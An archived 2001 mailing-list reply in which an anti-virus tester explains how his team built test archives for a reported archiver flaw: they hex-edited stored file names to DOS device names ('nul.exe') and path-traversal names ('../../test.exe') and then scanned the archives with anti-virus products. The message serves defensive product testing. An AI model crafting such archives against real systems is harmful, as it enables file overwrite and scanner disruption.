Re: SECURITY.NNOV: special devices access in multiple archivers

From: Andreas Marx (amarx@gega-it.de)
Date: Fri Aug 03 2001 - 04:43:06 PDT

Next message: Paul Burney: "Re: phpBB 1.4.0 bug leads to easy admin privileges"

Previous message: hypoclear: "REPOST: A damaging local DoS in WinNT SP6a"
Next in thread: Juergen P. Meier: "Re: SECURITY.NNOV: special devices access in multiple archivers"
Reply: Juergen P. Meier: "Re: SECURITY.NNOV: special devices access in multiple archivers"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi!

>Its nice to hear that from U. I just want to know that what are the methods
>and tools used by ur team for the testing the Anti-Virus
>If u can send them to me, then i am very thankful to u

We, the Anti-Virus Test Team at the University of Magdeburg ( 
http://www.av-test.org ) did it the following way (I don't want to be too 
exact, because of the script kiddies, sorry):

First we've created normal archives using a standard archivers (and normal 
file names like "xul.exe"), but after the archive was created, we have 
edited the files internally using a hex editor (change "x" to "n" - but be 
careful, in ZIP files the fine name is included twice). You cannot add 
names like "nul.exe" to an archive, of course, but you can change the name 
inside of the archives easily, if the length of the name will still be the 
same. You can do this for both "nul.exe" or for additional "../"'s for 
paths like "../../test.exe". (Btw, we have used the Volkow Commander (DOS), 
not a "real" hex editor. :) )

Second step was to test the anti-virus and anti-trojan programs. This was 
relatively simple, because a few days ago we have just finished a bigger 
comparison test for trojaner-info.de, a big German security site ( 
http://www.trojaner-info.de/test_07_2001.shtml ) with a special focus on 
trojan horses, backdoors etc. Additional tests were done using a slightly 
older test set of a review we did for the German PC-WELT magazine ( 
http://www.pcwelt.de/ratgeber/anwendungen/viren-report/16583/3.html ). We 
can easily restore the original tested programs including updates, since 
we're using Ghost images for all types of tests. (This includes both the 
original test platforms, like "plain Win98", and a Ghost image where the av 
program was already installed.)

The main test was relatively simply - simple scan the archives (for each of 
the tests we created at least four test files) and look what will happen. 
;-) After this, we have repeated the test to ensure that all results were 
correct.

I hope, this helps to understand the test procedures better.

cheers,
Andreas Marx

NEW: Notes 4/5 + Exchange 5.5/2000 Test -> http://www.av-test.org


-- 
Andreas Marx <amarx@gega-it.de>, http://www.av-test.de
GEGA IT-Solutions GbR, Klewitzstr. 7, 39112 Magdeburg, Germany
Tel: 0391/6075466, Mobil: 0177/6133033, Fax: 0391/6075469

Next message: Paul Burney: "Re: phpBB 1.4.0 bug leads to easy admin privileges"
Previous message: hypoclear: "REPOST: A damaging local DoS in WinNT SP6a"
Next in thread: Juergen P. Meier: "Re: SECURITY.NNOV: special devices access in multiple archivers"
Reply: Juergen P. Meier: "Re: SECURITY.NNOV: special devices access in multiple archivers"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Aug 03 2001 - 15:01:11 PDT